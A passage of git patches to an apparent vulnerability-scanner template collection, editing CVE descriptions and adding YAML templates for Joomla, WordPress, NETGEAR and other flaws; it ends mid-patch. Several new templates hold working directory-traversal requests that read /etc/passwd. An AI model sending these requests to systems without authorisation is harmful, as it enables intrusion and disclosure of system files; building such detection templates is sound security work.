[PATCH 1903/4083] Make description better --- cves/2019/CVE-2019-15713.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-15713.yaml b/cves/2019/CVE-2019-15713.yaml index 8c4d2b28be..e2cf961b99 100644 --- a/cves/2019/CVE-2019-15713.yaml +++ b/cves/2019/CVE-2019-15713.yaml @@ -4,7 +4,7 @@ info: name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS) author: daffainfo,dhiyaneshDk severity: medium - description: Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site. + description: The my-calendar plugin before 3.1.10 for WordPress has XSS. Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site. reference: - https://wpscan.com/vulnerability/9267 - https://nvd.nist.gov/vuln/detail/CVE-2019-15713 From 3a1f7e0910ef52e106737439bef202ad36d5e8fe Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 29 Aug 2021 09:36:50 +0300 Subject: [PATCH 1904/4083] Remove | --- cves/2018/CVE-2018-9995.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-9995.yaml b/cves/2018/CVE-2018-9995.yaml index 5295623e85..94fda9b71e 100644 --- a/cves/2018/CVE-2018-9995.yaml +++ b/cves/2018/CVE-2018-9995.yaml @@ -8,7 +8,7 @@ info: MDVR Login, which run re-branded versions of the original TBK DVR4104 and DVR4216 series, allow remote attackers to bypass authentication via a "Cookie: uid=admin" header, as demonstrated by a device.rsp?opt=user&cmd=list request that provides credentials within JSON data in a response. - reference: | + reference: - http://misteralfa-hack.blogspot.cl/2018/04/tbk-vision-dvr-login-bypass.html - http://misteralfa-hack.blogspot.cl/2018/04/update-dvr-login-bypass-cve-2018-9995.html - https://www.bleepingcomputer.com/news/security/new-hacking-tool-lets-users-access-a-bunch-of-dvrs-and-their-video-feeds/ From 67fa97aed16105ad3c28077522de90517b0bf0c6 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 29 Aug 2021 09:36:59 +0300 Subject: [PATCH 1905/4083] Add vendor KB --- cves/2020/CVE-2020-27866.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2020/CVE-2020-27866.yaml b/cves/2020/CVE-2020-27866.yaml index 9222bdaf5d..c313cfa883 100644 --- a/cves/2020/CVE-2020-27866.yaml +++ b/cves/2020/CVE-2020-27866.yaml @@ -10,6 +10,7 @@ info: - https://wzt.ac.cn/2021/01/13/AC2400_vuln/ - https://www.zerodayinitiative.com/advisories/ZDI-20-1451/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866 + - https://kb.netgear.com/000062641/Security-Advisory-for-Password-Recovery-Vulnerabilities-on-Some-Routers requests: - raw: From b7a07227596e51439c53112319bce22d72460bf2 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 29 Aug 2021 09:37:04 +0300 Subject: [PATCH 1906/4083] Remove | --- cves/2016/CVE-2016-10956.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2016/CVE-2016-10956.yaml b/cves/2016/CVE-2016-10956.yaml index 04a98f605e..4134b4a8b4 100644 --- a/cves/2016/CVE-2016-10956.yaml +++ b/cves/2016/CVE-2016-10956.yaml @@ -5,7 +5,7 @@ info: author: daffainfo,0x240x23elu severity: high description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php. - reference: | + reference: - https://cxsecurity.com/issue/WLB-2016080220 - https://wpvulndb.com/vulnerabilities/8609 tags: cve,cve2016,wordpress,wp-plugin,lfi From 86f3c08ba6d71f30c31580c30570649faec3c6c6 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 29 Aug 2021 09:39:06 +0300 Subject: [PATCH 1907/4083] Vendor writes it as "NETGEAR" --- cves/2016/CVE-2016-5649.yaml | 2 +- cves/2020/CVE-2020-26919.yaml | 2 +- cves/2020/CVE-2020-27866.yaml | 2 +- vulnerabilities/other/netgear-router-auth-bypass.yaml | 2 +- vulnerabilities/other/netgear-router-exposure.yaml | 4 ++-- vulnerabilities/other/netgear-wnap320-rce.yaml | 4 ++-- 6 files changed, 8 insertions(+), 8 deletions(-) diff --git a/cves/2016/CVE-2016-5649.yaml b/cves/2016/CVE-2016-5649.yaml index edea993ef6..5fa539874d 100644 --- a/cves/2016/CVE-2016-5649.yaml +++ b/cves/2016/CVE-2016-5649.yaml @@ -1,7 +1,7 @@ id: CVE-2016-5649 info: - name: Netgear DGN2200 / DGND3700 - Admin Password Disclosure + name: NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure author: suman_kar severity: critical description: Vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. Attacker can use this password to gain administrator access of the targeted routers web interface. diff --git a/cves/2020/CVE-2020-26919.yaml b/cves/2020/CVE-2020-26919.yaml index ca236a5505..cc1e8636a0 100644 --- a/cves/2020/CVE-2020-26919.yaml +++ b/cves/2020/CVE-2020-26919.yaml @@ -1,7 +1,7 @@ id: CVE-2020-26919 info: - name: Netgear ProSAFE Plus - Unauthenticated Remote Code Execution + name: NETGEAR ProSAFE Plus - Unauthenticated Remote Code Execution author: gy741 severity: critical description: It was found that every section of the web could be used as a valid endpoint to submit POST requests being the action defined by the submitId argument. The problem was located in the login.html webpage, that has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow users execute system commands. diff --git a/cves/2020/CVE-2020-27866.yaml b/cves/2020/CVE-2020-27866.yaml index c313cfa883..cc13503b5f 100644 --- a/cves/2020/CVE-2020-27866.yaml +++ b/cves/2020/CVE-2020-27866.yaml @@ -1,7 +1,7 @@ id: CVE-2020-27866 info: - name: Netgear Authentication Bypass vulnerability + name: NETGEAR Authentication Bypass vulnerability author: gy741 severity: high description: This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability. diff --git a/vulnerabilities/other/netgear-router-auth-bypass.yaml b/vulnerabilities/other/netgear-router-auth-bypass.yaml index 7d0f85a1b5..4f6c12b3c8 100644 --- a/vulnerabilities/other/netgear-router-auth-bypass.yaml +++ b/vulnerabilities/other/netgear-router-auth-bypass.yaml @@ -1,7 +1,7 @@ id: netgear-router-auth-bypass info: - name: Netgear DGN2200v1 Router Authentication Bypass + name: NETGEAR DGN2200v1 Router Authentication Bypass author: gy741 severity: high description: NETGEAR decided to use to check if a page has “.jpg”, “.gif” or “ess_” substrings, trying to match the entire URL. We can therefore access any page on the device, including those that require authentication, by appending a GET variable with the relevant substring (like “?.gif”). diff --git a/vulnerabilities/other/netgear-router-exposure.yaml b/vulnerabilities/other/netgear-router-exposure.yaml index 63063665dd..381f0973b1 100644 --- a/vulnerabilities/other/netgear-router-exposure.yaml +++ b/vulnerabilities/other/netgear-router-exposure.yaml @@ -1,8 +1,8 @@ id: netgear-router-exposure info: - name: Netgear Router S/N Disclosure - description: Multiple Netgear router models disclose their serial number which can be used to obtain the admin password if password recovery is enabled. + name: NETGEAR Router S/N Disclosure + description: Multiple NETGEAR router models disclose their serial number which can be used to obtain the admin password if password recovery is enabled. reference: - https://www.exploit-db.com/exploits/47117 - https://www.exploit-db.com/exploits/45741 diff --git a/vulnerabilities/other/netgear-wnap320-rce.yaml b/vulnerabilities/other/netgear-wnap320-rce.yaml index e227e9d27f..fcbe0611ec 100644 --- a/vulnerabilities/other/netgear-wnap320-rce.yaml +++ b/vulnerabilities/other/netgear-wnap320-rce.yaml @@ -1,10 +1,10 @@ id: netgear-wnap320-rce info: - name: Netgear WNAP320 Access Point - Remote Code Execution (Unauthenticated) + name: NETGEAR WNAP320 Access Point - Remote Code Execution (Unauthenticated) author: gy741 severity: critical - description: vulnerabilities in the web-based management interface of Netgear WNAP320 Access Point could allow an authenticated, remote attacker to perform command injection attacks against an affected device. + description: vulnerabilities in the web-based management interface of NETGEAR WNAP320 Access Point could allow an authenticated, remote attacker to perform command injection attacks against an affected device. reference: - https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE tags: netgear,rce,oob,router From 5e27e5d52874289e8545d938ab42c1094ad85c39 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 29 Aug 2021 09:42:18 +0300 Subject: [PATCH 1908/4083] Add description --- cves/2018/CVE-2018-18777.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/cves/2018/CVE-2018-18777.yaml b/cves/2018/CVE-2018-18777.yaml index 57a3a8d4e7..cdea8f68ec 100644 --- a/cves/2018/CVE-2018-18777.yaml +++ b/cves/2018/CVE-2018-18777.yaml @@ -4,6 +4,10 @@ info: name: Path traversal vulnerability in Microstrategy Web version 7 author: 0x_Akoko severity: high + description: | + Directory traversal vulnerability in Microstrategy Web, version 7, in "/WebMstr7/servlet/mstrWeb" (in the parameter subpage) + allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /.. + (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product. reference: https://www.exploit-db.com/exploits/45755 tags: microstrategy,lfi From f6e9fea5c40bd94ee5e7108921c22f510f77fd00 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 29 Aug 2021 09:43:37 +0300 Subject: [PATCH 1909/4083] Update the description --- cves/2021/CVE-2021-24210.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-24210.yaml b/cves/2021/CVE-2021-24210.yaml index 66627bd36e..90452b4356 100644 --- a/cves/2021/CVE-2021-24210.yaml +++ b/cves/2021/CVE-2021-24210.yaml @@ -3,7 +3,11 @@ id: CVE-2021-24210 info: name: PhastPress < 1.111 - Open Redirect author: 0x_Akoko - description: There is an open redirect in the plugin that allows an attacker to malform a request to a page with the plugin and then redirect the victim to a malicious page. + description: | + There is an open redirect in the PhastPress WordPress plugin before 1.111 that allows an attacker to malform a request to a page + with the plugin and then redirect the victim to a malicious page. There is also a support comment from another user one year + ago (https://wordpress.org/support/topic/phast-php-used-for-remote-fetch/) that says that the php involved in the request only + go to whitelisted pages but it's possible to redirect the victim to any domain. reference: https://wpscan.com/vulnerability/9b3c5412-8699-49e8-b60c-20d2085857fb severity: low tags: wordpress,cve,cve2021,redirect From 5526895971f72a8378575f0b3b105267280cc459 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 29 Aug 2021 09:45:32 +0300 Subject: [PATCH 1910/4083] Fix description --- cves/2021/CVE-2021-35464.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-35464.yaml b/cves/2021/CVE-2021-35464.yaml index 2a3107ae73..ea5dcbd8b5 100644 --- a/cves/2021/CVE-2021-35464.yaml +++ b/cves/2021/CVE-2021-35464.yaml @@ -3,7 +3,11 @@ id: CVE-2021-35464 info: author: madrobot name: Pre-auth RCE in ForgeRock OpenAM - description: ForgeRock OpenAM unsafe Java deserialization RCE. + description: | + ForgeRock AM server before 7.0 has a Java deserialization vulnerability in the jato.pageSession parameter on multiple pages. + The exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted + /ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO) + found in versions of Java 8 or earlier severity: critical tags: cve,cve2021,openam,rce,java reference: From 5f446d45534edbe46f080318151063ed505254e6 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 29 Aug 2021 09:47:35 +0300 Subject: [PATCH 1911/4083] Updated description --- cves/2021/CVE-2021-24387.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-24387.yaml b/cves/2021/CVE-2021-24387.yaml index 6c944264c9..0e7156dea8 100644 --- a/cves/2021/CVE-2021-24387.yaml +++ b/cves/2021/CVE-2021-24387.yaml @@ -3,7 +3,10 @@ id: CVE-2021-24387 info: name: Real Estate 7 WordPress Theme < 3.1.1 - Unauthenticated Reflected XSS author: suman_kar - description: XSS in wordpress via ct_community parameter + description: | + The WP Pro Real Estate 7 WordPress theme before 3.1.1 did not properly sanitise the ct_community parameter + in its search listing page before outputting it back in it, leading to a reflected Cross-Site Scripting which + can be triggered in both unauthenticated or authenticated user context severity: medium tags: cve,cve2021,xss,wordpress reference: https://cxsecurity.com/issue/WLB-2021070041 From 47b2395031e58e14f2bc8a2cab59464b014f2fd4 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Sun, 29 Aug 2021 09:48:18 +0300 Subject: [PATCH 1912/4083] Add description --- cves/2017/CVE-2017-15944.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2017/CVE-2017-15944.yaml b/cves/2017/CVE-2017-15944.yaml index 2312d8d61a..f68fcd4a77 100644 --- a/cves/2017/CVE-2017-15944.yaml +++ b/cves/2017/CVE-2017-15944.yaml @@ -3,6 +3,7 @@ id: CVE-2017-15944 info: name: PreAuth RCE on Palo Alto GlobalProtect author: emadshanab,milo2012 + description: Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface. reference: - https://www.exploit-db.com/exploits/43342 - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html From ac68ef0e9aea3f106393f8ea5ac2fd8bd7f41d7e Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 29 Aug 2021 14:44:12 +0530 Subject: [PATCH 1913/4083] misc updates --- cves/2018/CVE-2018-17254.yaml | 2 +- cves/2018/CVE-2018-18777.yaml | 4 ++-- cves/2018/CVE-2018-9995.yaml | 6 +++--- cves/2021/CVE-2021-24210.yaml | 6 +++--- cves/2021/CVE-2021-24387.yaml | 4 ++-- cves/2021/CVE-2021-35464.yaml | 4 ++-- 6 files changed, 13 insertions(+), 13 deletions(-) diff --git a/cves/2018/CVE-2018-17254.yaml b/cves/2018/CVE-2018-17254.yaml index 003557af06..fbcb014f26 100644 --- a/cves/2018/CVE-2018-17254.yaml +++ b/cves/2018/CVE-2018-17254.yaml @@ -6,7 +6,7 @@ info: description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter. severity: high tags: joomla,sqli,cve,cve2018 - reference: | + reference: - http://packetstormsecurity.com/files/161683/Joomla-JCK-Editor-6.4.4-SQL-Injection.html - https://www.exploit-db.com/exploits/45423/ diff --git a/cves/2018/CVE-2018-18777.yaml b/cves/2018/CVE-2018-18777.yaml index cdea8f68ec..cba64072e6 100644 --- a/cves/2018/CVE-2018-18777.yaml +++ b/cves/2018/CVE-2018-18777.yaml @@ -5,8 +5,8 @@ info: author: 0x_Akoko severity: high description: | - Directory traversal vulnerability in Microstrategy Web, version 7, in "/WebMstr7/servlet/mstrWeb" (in the parameter subpage) - allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /.. + Directory traversal vulnerability in Microstrategy Web, version 7, in "/WebMstr7/servlet/mstrWeb" (in the parameter subpage) + allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product. reference: https://www.exploit-db.com/exploits/45755 tags: microstrategy,lfi diff --git a/cves/2018/CVE-2018-9995.yaml b/cves/2018/CVE-2018-9995.yaml index 94fda9b71e..d97e5a8118 100644 --- a/cves/2018/CVE-2018-9995.yaml +++ b/cves/2018/CVE-2018-9995.yaml @@ -4,9 +4,9 @@ info: author: princechaddha severity: high description: | - TBK DVR4104 and DVR4216 devices, as well as Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and - MDVR Login, which run re-branded versions of the original TBK DVR4104 and DVR4216 series, allow remote attackers to bypass - authentication via a "Cookie: uid=admin" header, as demonstrated by a device.rsp?opt=user&cmd=list request that provides + TBK DVR4104 and DVR4216 devices, as well as Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and + MDVR Login, which run re-branded versions of the original TBK DVR4104 and DVR4216 series, allow remote attackers to bypass + authentication via a "Cookie: uid=admin" header, as demonstrated by a device.rsp?opt=user&cmd=list request that provides credentials within JSON data in a response. reference: - http://misteralfa-hack.blogspot.cl/2018/04/tbk-vision-dvr-login-bypass.html diff --git a/cves/2021/CVE-2021-24210.yaml b/cves/2021/CVE-2021-24210.yaml index 90452b4356..faca3d5383 100644 --- a/cves/2021/CVE-2021-24210.yaml +++ b/cves/2021/CVE-2021-24210.yaml @@ -4,9 +4,9 @@ info: name: PhastPress < 1.111 - Open Redirect author: 0x_Akoko description: | - There is an open redirect in the PhastPress WordPress plugin before 1.111 that allows an attacker to malform a request to a page - with the plugin and then redirect the victim to a malicious page. There is also a support comment from another user one year - ago (https://wordpress.org/support/topic/phast-php-used-for-remote-fetch/) that says that the php involved in the request only + There is an open redirect in the PhastPress WordPress plugin before 1.111 that allows an attacker to malform a request to a page + with the plugin and then redirect the victim to a malicious page. There is also a support comment from another user one year + ago (https://wordpress.org/support/topic/phast-php-used-for-remote-fetch/) that says that the php involved in the request only go to whitelisted pages but it's possible to redirect the victim to any domain. reference: https://wpscan.com/vulnerability/9b3c5412-8699-49e8-b60c-20d2085857fb severity: low diff --git a/cves/2021/CVE-2021-24387.yaml b/cves/2021/CVE-2021-24387.yaml index 0e7156dea8..fa60b34342 100644 --- a/cves/2021/CVE-2021-24387.yaml +++ b/cves/2021/CVE-2021-24387.yaml @@ -4,8 +4,8 @@ info: name: Real Estate 7 WordPress Theme < 3.1.1 - Unauthenticated Reflected XSS author: suman_kar description: | - The WP Pro Real Estate 7 WordPress theme before 3.1.1 did not properly sanitise the ct_community parameter - in its search listing page before outputting it back in it, leading to a reflected Cross-Site Scripting which + The WP Pro Real Estate 7 WordPress theme before 3.1.1 did not properly sanitise the ct_community parameter + in its search listing page before outputting it back in it, leading to a reflected Cross-Site Scripting which can be triggered in both unauthenticated or authenticated user context severity: medium tags: cve,cve2021,xss,wordpress diff --git a/cves/2021/CVE-2021-35464.yaml b/cves/2021/CVE-2021-35464.yaml index ea5dcbd8b5..f3e3f41ee9 100644 --- a/cves/2021/CVE-2021-35464.yaml +++ b/cves/2021/CVE-2021-35464.yaml @@ -5,8 +5,8 @@ info: name: Pre-auth RCE in ForgeRock OpenAM description: | ForgeRock AM server before 7.0 has a Java deserialization vulnerability in the jato.pageSession parameter on multiple pages. - The exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted - /ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO) + The exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted + /ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO) found in versions of Java 8 or earlier severity: critical tags: cve,cve2021,openam,rce,java From f16e7fbb2a8d64e1243b154238b4633f57ace278 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 29 Aug 2021 15:15:16 +0530 Subject: [PATCH 1914/4083] misc update --- miscellaneous/aws-ecs-container-agent-tasks.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/miscellaneous/aws-ecs-container-agent-tasks.yaml b/miscellaneous/aws-ecs-container-agent-tasks.yaml index 26eb1b03c8..f943f67776 100644 --- a/miscellaneous/aws-ecs-container-agent-tasks.yaml +++ b/miscellaneous/aws-ecs-container-agent-tasks.yaml @@ -6,17 +6,20 @@ info: severity: info tags: aws,docker description: Aws container metadata content - reference: https://docs.aws.amazon.com/en_us/elasticbeanstalk/latest/dg/create_deploy_docker_ecstutorial.html + reference: https://docs.aws.amazon.com/en_us/elasticbeanstalk/latest/dg/create_deploy_docker_ecstutorial.html#create_deploy_docker_ecstutorial_connect_inspect + requests: - method: GET path: - "{{BaseURL}}/v1/metadata" - "{{BaseURL}}/v1/tasks" + matchers-condition: and matchers: - type: word words: - "arn:aws:ecs" + - type: status status: - - 200 + - 200 \ No newline at end of file From b01ae5648fd9064e6ee6562ef31d32b82d31c6c9 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 29 Aug 2021 15:16:04 +0530 Subject: [PATCH 1915/4083] added tags --- miscellaneous/aws-ecs-container-agent-tasks.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/miscellaneous/aws-ecs-container-agent-tasks.yaml b/miscellaneous/aws-ecs-container-agent-tasks.yaml index f943f67776..84ffe70e43 100644 --- a/miscellaneous/aws-ecs-container-agent-tasks.yaml +++ b/miscellaneous/aws-ecs-container-agent-tasks.yaml @@ -4,7 +4,7 @@ info: name: aws-ecs-container-agent-tasks author: dogasantos severity: info - tags: aws,docker + tags: aws,docker,ec2 description: Aws container metadata content reference: https://docs.aws.amazon.com/en_us/elasticbeanstalk/latest/dg/create_deploy_docker_ecstutorial.html#create_deploy_docker_ecstutorial_connect_inspect From fb975e9903a8def0fc4142678e8fcb6c21f58630 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 29 Aug 2021 17:12:56 +0700 Subject: [PATCH 1916/4083] Create CVE-2010-1219.yaml --- cves/2010/CVE-2010-1219.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1219.yaml diff --git a/cves/2010/CVE-2010-1219.yaml b/cves/2010/CVE-2010-1219.yaml new file mode 100644 index 0000000000..d43fb80967 --- /dev/null +++ b/cves/2010/CVE-2010-1219.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1219 + +info: + name: Joomla! Component com_janews - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/11757 + - https://www.cvedetails.com/cve/CVE-2010-1219 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From f4777035ef53e95049740fb3367340805f7ff59e Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 29 Aug 2021 17:21:24 +0700 Subject: [PATCH 1917/4083] Create CVE-2010-1304.yaml --- cves/2010/CVE-2010-1304.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1304.yaml diff --git a/cves/2010/CVE-2010-1304.yaml b/cves/2010/CVE-2010-1304.yaml new file mode 100644 index 0000000000..96833ebf19 --- /dev/null +++ b/cves/2010/CVE-2010-1304.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1304 + +info: + name: Joomla! Component User Status - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/11998 + - https://www.cvedetails.com/cve/CVE-2010-1304 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 6bade7372705b3cae5575d874b4098047cd09178 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 29 Aug 2021 17:13:44 +0530 Subject: [PATCH 1918/4083] Create webpack-sourcemap-disclosure.yaml --- .../files/webpack-sourcemap-disclosure.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposures/files/webpack-sourcemap-disclosure.yaml diff --git a/exposures/files/webpack-sourcemap-disclosure.yaml b/exposures/files/webpack-sourcemap-disclosure.yaml new file mode 100644 index 0000000000..9f83d5d28b --- /dev/null +++ b/exposures/files/webpack-sourcemap-disclosure.yaml @@ -0,0 +1,24 @@ +id: webpack-sourcemap-disclosure + +info: + name: Webpack Sourcemap Disclosure + author: dhiyaneshDk + severity: medium + tags: exposure,files + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - ".js.map" + part: body + condition: and + + - type: status + status: + - 200 From 02b429fe897a095e5526632604c32ff921b5a52d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 29 Aug 2021 17:56:50 +0530 Subject: [PATCH 1919/4083] Update CVE-2018-8719.yaml --- cves/2018/CVE-2018-8719.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2018/CVE-2018-8719.yaml b/cves/2018/CVE-2018-8719.yaml index 9406170aa3..538ffeeb26 100644 --- a/cves/2018/CVE-2018-8719.yaml +++ b/cves/2018/CVE-2018-8719.yaml @@ -9,7 +9,7 @@ info: - https://www.exploit-db.com/exploits/44371 - https://vuldb.com/?id.115817 - https://www.cvedetails.com/cve/CVE-2018-8719/ - tags: wordpress,cve2018,exposure + tags: wordpress,wp-plugin,cve,cve2018,exposure requests: - method: GET @@ -28,4 +28,4 @@ requests: condition: or - type: word words: - - 'Index of' \ No newline at end of file + - 'Index of' From 30d762883b72110023318851dd7380bc5c9ade86 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 29 Aug 2021 17:57:29 +0530 Subject: [PATCH 1920/4083] Update CVE-2019-17503.yaml --- cves/2019/CVE-2019-17503.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-17503.yaml b/cves/2019/CVE-2019-17503.yaml index c389965dd5..836d2793d8 100644 --- a/cves/2019/CVE-2019-17503.yaml +++ b/cves/2019/CVE-2019-17503.yaml @@ -8,7 +8,7 @@ info: reference: - https://www.exploit-db.com/exploits/47498 - https://nvd.nist.gov/vuln/detail/CVE-2019-17503 - tags: cve2019,exposure + tags: cve,cve2019,exposure requests: - method: GET From 8c1de71ec9e16dcc452b0c413497d2e003315035 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 29 Aug 2021 18:50:29 +0530 Subject: [PATCH 1921/4083] wip - update --- exposures/files/webpack-sourcemap-disclosure.yaml | 14 +++++++++++--- 1 file changed, 11 insertions(+), 3 deletions(-) diff --git a/exposures/files/webpack-sourcemap-disclosure.yaml b/exposures/files/webpack-sourcemap-disclosure.yaml index 9f83d5d28b..497b3bbd21 100644 --- a/exposures/files/webpack-sourcemap-disclosure.yaml +++ b/exposures/files/webpack-sourcemap-disclosure.yaml @@ -10,15 +10,23 @@ requests: - method: GET path: - "{{BaseURL}}" + - "{{RootURL}}/{{Path}}/{{map}}.js.map" matchers-condition: and matchers: - type: word words: - - ".js.map" - part: body - condition: and + - "application/octet-stream" + part: header - type: status status: - 200 + + extractors: + - type: regex + internal: true + name: map + group: 1 + regex: + - "sourceMappingURL=([a-z0-9.]+).js.map" \ No newline at end of file From 5aaa5e9d0defd218e358198c7b5d0681236b6dee Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 30 Aug 2021 05:52:36 +0700 Subject: [PATCH 1922/4083] Create CVE-2010-1305.yaml --- cves/2010/CVE-2010-1305.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1305.yaml diff --git a/cves/2010/CVE-2010-1305.yaml b/cves/2010/CVE-2010-1305.yaml new file mode 100644 index 0000000000..ca2155a2d3 --- /dev/null +++ b/cves/2010/CVE-2010-1305.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1305 + +info: + name: Joomla! Component JInventory 1.23.02 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12065 + - https://www.cvedetails.com/cve/CVE-2010-1305 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 20440599cfe548ff13e930d329a7bfe2d2ba7a3b Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 30 Aug 2021 06:02:53 +0700 Subject: [PATCH 1923/4083] Create CVE-2010-1354.yaml --- cves/2010/CVE-2010-1354.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1354.yaml diff --git a/cves/2010/CVE-2010-1354.yaml b/cves/2010/CVE-2010-1354.yaml new file mode 100644 index 0000000000..2b37852cfc --- /dev/null +++ b/cves/2010/CVE-2010-1354.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1354 + +info: + name: Joomla! Component VJDEO 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12102 + - https://www.cvedetails.com/cve/CVE-2010-1354 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - 